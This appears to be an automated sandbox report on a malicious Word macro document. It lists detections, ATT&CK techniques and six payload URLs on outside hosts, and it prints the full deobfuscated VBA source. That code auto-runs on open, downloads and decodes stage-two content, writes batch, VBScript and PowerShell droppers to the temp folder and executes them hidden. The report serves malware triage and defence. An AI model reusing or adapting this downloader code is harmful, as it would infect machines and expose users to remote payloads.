MALICIOUS
376
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1105 Ingress Tool Transfer
T1204.002 Malicious File
The sample is a malicious Office document containing VBA macros. The macros are obfuscated and use a CreateObject call to download a payload from several URLs, including http://suddhi.com/wp-content/plugins/wp-db-backup-made/kaka.txt. The presence of AutoOpen and Shell calls indicates an attempt to execute malicious code upon opening the document.
Heuristics 14
-
ClamAV: Doc.Downloader.Generic-6698421-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Generic-6698421-0
-
VBA macros detected medium 9 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
a = Shell(b, 0) -
Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATIONVBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.Matched line in script
Set objXML = CreateObject("" & QHDHUQW) -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set objXML = CreateObject("" & QHDHUQW) -
Payload URL assembled from a Chr()/Asc() string expression (6 URLs) high OLE_VBA_EXPR_DROPPER_URLA VBA macro builds its stage-2 download URL character by character from string literals concatenated with Chr()/Asc()/StrReverse() results — often nested (Chr(Asc(Chr(Asc("h")))) = "h") and split across the + and & operators, sometimes written out via Print #n, into a second-stage VBScript/PowerShell file. The URL is assembled at run time and never appears contiguously on disk, and there is no numeric array to brute-force, so a literal scan and the array recoverers both miss it. A bounded expression evaluator resolved it; surfaced as an IOC. Self-validating: only a valid host URL that is not already present verbatim in the macro is reported, so a benign macro cannot false-positive.
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
Sub Workbook_Open() -
Auto_Open macro low OLE_VBA_AUTOAuto_Open macroMatched line in script
Sub Auto_Open() -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
Goabc = Environ(sps) -
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://suddhi.com/wp-content/plugins/wp-db-backup-made/kaka.txt Referenced by macro
- http://suddhi.com/wp-content/plugins/wp-db-backup-made/785621735.txt123123123Referenced by macro
- http://savepic.su/5751812.jpgReferenced by macro
- http://savepic.su/5757956.jpgReferenced by macro
- http://kreducationaltrust.com/images/full/785621735.txtReferenced by macro
- http://kreducationaltrust.com/images/full/kaka.txtReferenced by macro
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10023 bytes |
SHA-256: 8c4b66b8e60577ed80882d641fa44e765b7ccbc96c8e0a7b4ec98ed469904032 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
69 of 175 identifiers look randomly generated (e.g. 'Huwhdyqgyqwgdguqwgdhbdajhsbd'); 4 string-concatenation chain(s) — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Vyuqwdguyqwgqd_Open()
End Sub
Sub Auto_Open()
Ggyqwgdyqwgudqg
End Sub
Sub Uuhqwdqjwdkqwhdjqk()
BHQGDUYGQWUGDQW = "qwkjdhqkw hdiquwh diwhdqwhd qwhidqw h"
End Sub
Sub Ggyqwgdyqwgudqg()
Dim huwe, auwd As Integer, aabbb As Integer
Dim asjiw As Integer, woweffect As Integer, jwasssssdas As Integer, asdsssssjqwdq As Integer
Dim retVal As Variant
Dim HPPSDJ As String
YUGQYD = Ubqhwdhwqbd(15231) + ""
FL2 = YUGQYD
HPPSDJ = "" + "" & "Te" + "mp" & ""
PH2 = Module4.Goabc(HPPSDJ) + "\"
woweffect = CInt(YUGQYD)
jwnqdw = 1 - woweffect
JIQWDJQ = 12312312
JIQWDJQ = 1 + 1 + 113 + Sgn(jwnqdw)
AAAA = JIQWDJQ
HYWDAX = "babyuqgw duqywg uyqwguyqwg duywqg dqwgt"
JWIDJIAAA = ""
HUYFEA = "qiowjd iqwhuqwhdiuqwhdwuhdiqwhduiq "
QIWJDABB = "b"
HUYFEA = QIWJDABB + "a" + "t"
IUQJWD = "qwljdlwqk"
PSFL = FL2 + "" & "." + "p" + "" + Chr(115) _
+ _
"1"
'+ Right(HYWDAX, 1)
SSS = Chr(AAAA + 1)
VBFL = FL2 + Chr(50 - 4) + "v" + "" + "" & "b" & "" & SSS & ""
huwe = 1
BAFL = FL2 + Chr(Sgn(Fix(-22.043)) + 11 + 10 + 25 + huwe + 0) + HUYFEA
INTG = "" & "o" & "bject"
KIWD = Chr(110 + Sgn(Len(BAFL))) + "d" + "" + "ul" + "e"
AFTG = "m" & KIWD
SXEE = Chr(46)
SXAA = Chr(101)
SXE = SXEE & SXAA & "xe"
GNG = ".jpg"
PHT = "" & "ht" & "t" & "p://" & ""
SPIC = "" & "" & Chr(115) + "" & "av" & "epi" + "c.su" + Chr(46 + 1)
PSPTH = PH2 + PSFL
VBPTH = PH2 + VBFL
BAPTH = "bauqwhduiq hwgdhj dvbnsavd uqywgdq jwhdgwqd"
ABPTH = PH2 + BAFL
BAPTH = ABPTH
Dim AAAAHUQW As Integer, DRT As Integer, BFT As Integer, CFT As Integer, DFT As Integer, EFT As Integer
DRT = 315
BFT = 316
CFT = 317
DFT = 318
EFT = 319
Dim NUWDHUQHUQWDH As String
NUWDHUQHUQWDH = "USE" & "RPROFILE"
Dim PBIn As String, asdwq As String, MIWDWQ As String
CDDD = "785621735.txt"
LNSS = "kaka.txt"
STT1 = "suddhi.com/w" + "p-co" + "ntent/plu" + "gins/w" + "p-db-bac" + "kup-made/"
STT2 = "kreducationaltrust.com/images/full/"
PBIn = PHT + STT1 + CDDD
CONT = Module4.Kace(PBIn)
asdwq = Right(CONT, 1)
HQUWDAAA = "0"
If (asdwq <> "=") Then
PBIn = PHT + STT2 + CDDD
CONT = Module4.Kace(PBIn)
asdwq = CONT
HQUWDAAA = "1"
End If
CONT = Quqhwdbyas(asdwq)
TVT10 = Port(CONT, "text10")
TVT20 = Port(CONT, "text20")
TVT21 = Port(CONT, "text21")
TVT30 = Port(CONT, "text30")
TVT31 = Port(CONT, "text31")
XPT1 = Port(CONT, "stext1")
XPT2 = Port(CONT, "stext2")
XPT3 = Port(CONT, "stext3")
WVR = Module4.Goabc(NUWDHUQHUQWDH)
hufehu1 = InStr(WVR, "sers\")
Dim hudhw As Integer
Dim ghdAdd(1 To 3)
ghdAdd(1) = "1"
ghdAdd(2) = "0"
ghdAdd(3) = "0"
If (hufehu1 <> 0) Then
ghdAdd(1) = "2"
Else
ghdAdd(2) = "3"
End If
JHWQUD = Join(ghdAdd)
hudhw = Val(JHWQUD)
Module4.WaitFor (1)
MIWDWQ = PHT + STT1 + LNSS
If (HQUWDAAA = "1") Then
MIWDWQ = PHT + STT2 + LNSS
End If
SEXX = Module4.Kace(MIWDWQ)
PSTB = PBIn + "123123123"
MSTAR1 = SPIC + "5751812" + GNG
MSTAR2 = SPIC + "5757956" + GNG
STAR1 = PHT + MSTAR1
STAR2 = PHT + MSTAR2
FFQ = "8"
FF = FFQ + SXE
If (hudhw = 130) Then
Open BAPTH For Output As #DRT
Print #DRT, XPT1
Print #DRT, ":rtqdftqwfdhwgqf" & vbCrLf & "set trfd=" + Chr(34) + PH2 + Chr(34)
Print #DRT, "set nmsj=" + Chr(34) + FL2 + Chr(34)
Print #DRT, "set exds=" + Chr(34) + FFQ + Chr(34)
Print #DRT, XPT2
Close #DRT
Module4.WaitFor (1)
Open VBPTH For Output As #BFT
Print #BFT, "strRT = " + Chr(34) + SEXX + Chr(34)
Print #BFT, "statRT = " + Chr(34) + STAR1 + Chr(34)
Print #BFT, "" & "jfeu" & "ygq = " + Chr(34) & "" + FF + Chr(34) & ""
Print #BFT, "strTecation = " + Chr(34) + PH2 + Chr(34) + "+jfeuygq"
Print #BFT, XPT3
Close #BFT
BDDT.WaitFor (1)
NTH1 = Module4.Freat(retVal, BAPTH)
End If
HUDQG = "';"
If (hudhw = 200) Then
ZPQSKD = FL2
Open PSPTH For Output As #CFT
Print #CFT, "$ujdkwq = 'jqwdb';"
Print #CFT, "$stat = 'ht'+'tp://'+'" + MSTAR2 + "';"
Print #CFT, "$ggtt = '" + SEXX + "';"
Print #CFT, "$pths = '" + PH2 + "';"
Print #CFT, "$wehs = '" + ZPQSKD + HUDQG
Print #CFT, "$nnm = '" + FFQ + "';"
Print #CFT, TVT10
Close #CFT
Open VBPTH For Output As #DFT
Print #DFT, TVT30
Print #DFT, "c" + "urrentFile = " + Chr(34) + PH2 + Chr(34) + "&" + Chr(34) + FL2 + Chr(34) + "&djwq"
Print #DFT, TVT31
Close #DFT
Open BAPTH For Output As #EFT
Print #EFT, "@echo off"
Print #EFT, TVT20
Print #EFT, "set Ads3=" + Chr(34) + FL2 + Chr(34)
Print #EFT, ":nuwhdiwqgdg"
Print #EFT, "set Mts4=" + Chr(34) + PH2 + Chr(34) + "%Ads3%"
Print #EFT, TVT21
Close #EFT
Module4.WaitFor (1)
NTH2 = Module4.Freat(retVal, BAPTH)
End If
JUW = Chr(47)
AKK = Chr(60)
ZKK = ">"
NTH3 = Module6.Thwqbdhjabs(AKK + INTG + ZKK, AKK & JUW + INTG + ZKK, 1)
NTH4 = Module6.Thwqbdhjabs(AKK + AFTG + ZKK, AKK + JUW + AFTG + ZKK, 2)
NTH5 = Module6.Thwqbdhjabs(AKK + INTG + ZKK, "", 3)
NTH6 = Module6.Thwqbdhjabs(AKK + JUW + INTG + ZKK, "", 3)
NTH7 = Module6.Thwqbdhjabs(AKK + AFTG + ZKK, "", 3)
NTH8 = Module6.Thwqbdhjabs(AKK + JUW + AFTG + ZKK, "", 3)
End Sub
Sub AutoOpen()
Auto_Open
End Sub
Sub Workbook_Open()
NUQIWDHQWUIHD = "qygwduqgw yugwqyduqgduyqw dgqwdgqudgqwuydg qdkjas gdjhqgwdhjwgqd "
BYQUGDUYQWGDWQU = "jashdj ksahd kashdsahdkashd qihdwqidkq idhqiw duhdiu qhwduhqwihd q"
Auto_Open
GYUDWQGYUQGDU = "qwihd uqwhdy udgqwudg quwygdyuqwgd ahsgd kjqhjkdqwdwhiuwhdiu qwhdiq"
End Sub
Public Function Ubqhwdhwqbd(a As Integer)
Ubqhwdhwqbd = CStr(Int((a * Rnd) + 10000))
End Function
Public Function Quqhwdbyas(ByVal strData As String) As String
Dim objXML As Object
Dim objNode As Object
Dim huhwdq As Integer, nudqwd As Integer
nudqwd = Log(10)
huhwdq = Sgn(1 - nudqwd)
QHDHUQW = "" & Chr(78 + huhwdq) + "SXML2.DOMDocument"
Set objXML = CreateObject("" & QHDHUQW)
Set objNode = objXML.createElement("b6" + "4")
objNode.DataType = "bin.ba" & "se64"
objNode.Text = strData
WUDHA = objNode.nodeTypedValue
Quqhwdbyas = WUDHA
Set objNode = Nothing
Set objXML = Nothing
MWDQ = ""
End Function
Public Function Port(a, b As String)
Dim krd, tent As Integer
UQWD = Chr(60)
NDUW = "" & ">"
krd = InStr(1, a, UQWD + b + NDUW) + 8
tent = InStr(1, a, UQWD + "/" + b + NDUW) - krd
KLMN = Mid(a, krd, tent)
HUQHWDA = KLMN
Port = HUQHWDA
End Function
Attribute VB_Name = "Module1"
Attribute VB_Name = "Module2"
Attribute VB_Name = "Module3"
Attribute VB_Name = "Module4"
Public Function Goabc(sps As String)
Goabc = Environ(sps)
End Function
Sub WaitFor(NumOfSeconds As Long)
Dim SngSec As Long
SngSec = Timer + NumOfSeconds
Do While Timer < SngSec
DoEvents
Loop
End Sub
Public Function Kace(a As String)
Dim ygwdg As Integer, Huwhdyqgyqwgdguqwgdhbdajhsbd As Object
Dim ggFw As String
ggFw = a
Set Huwhdyqgyqwgdguqwgdhbdajhsbd = CreateObject("" + "MS" & "X" + "" + "ML2." & "Ser" & "ver" & "X" & "MLH" & "TT" & "P")
Huwhdyqgyqwgdguqwgdhbdajhsbd.Open "G" & "" & "ET", ggFw
JIQWJDIOWQ = "qlwjdk lwqjkd jqwdjqwhdjkqwh jkdq hj hqwjkdhqw diuhdwh diqwhdias dhqkwhdwjqkhdqkjwdhio qwhdo iqwhdwqih diu hdqw"
JIQWJDIOWQ = "qlwjdk lwqjkd jqwdjqwhdjkqwh jkdq hj hqwjkdhqw diuhdwh diqwhdias dhqkwhdwjqkhdqkjwdhio qwhdo iqwhdwqih diu hdqw"
JIQWJDIOWQ = "qlwjdk lwqjkd jqwdjqwhdjkqwh jkdq hj hqwjkdhqw diuhdwh diqwhdias dhqkwhdwjqkhdqkjwdhio qwhdo iqwhdwqih diu hdqw"
Huwhdyqgyqwgdguqwgdhbdajhsbd.Send ""
Kace = Huwhdyqgyqwgdguqwgdhbdajhsbd.ResponseText
End Function
Public Function Freat(a As Variant, b)
a = Shell(b, 0)
Freat = a
End Function
Attribute VB_Name = "Module5"
Attribute VB_Name = "Module6"
Public Function Thwqbdhjabs(dnuwhd As String, b As String, c As Integer)
Dim selectedText As String
Dim kjdksjdwqs As Range, selRange As Range
Set kjdksjdwqs = ActiveDocument.Range
With kjdksjdwqs.Find
.Text = dnuwhd
.MatchWholeWord = True
kjdksjdwqs.Find.Execute
kjdksjdwqs.Collapse direction:=wdCollapseEnd
Dim wdwq As String
Set selRange = ActiveDocument.Range
Dim wdsadwq As String
selRange.Start = kjdksjdwqs.End
.Text = b
.MatchWholeWord = True
.Execute
kjdksjdwqs.Collapse direction:=wdCollapseStart
selRange.End = kjdksjdwqs.Start
If (c = 1) Then
selectedText = selRange.Delete
End If
If (c = 2) Then
selRange.Font.Color = wdColorBlack
End If
Dim hduwaa As Integer
hduwaa = 1 - 423
If (c = 3) Then
With kjdksjdwqs.Find
.Text = a
.Replacement.Text = ""
'JHFJKHWQDWKHWQKDHWQK = "kwhdjkqwhwqkj dhjkqwd qhwdkjqd "
'QHWUDHQWIDWDH = "qh wduhqwidhqiwudhqhduiqwh duiqw "
'QHUWDHUIWQHIWUQHDWIUQ = "qwih duhqwudhqwiu dhqwi "
'NQUWDUQWBDWHQJBD = "huqwdiwhq iuqwhdq whduiqwh "
'DQWDWQDQDW = "nqwdu hiqwhiuqwhdqhwudi wqhdhqw d"
.Wrap = wdFindContinue
.Execute Replace:=wdReplaceAll
End With
End If
End With
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.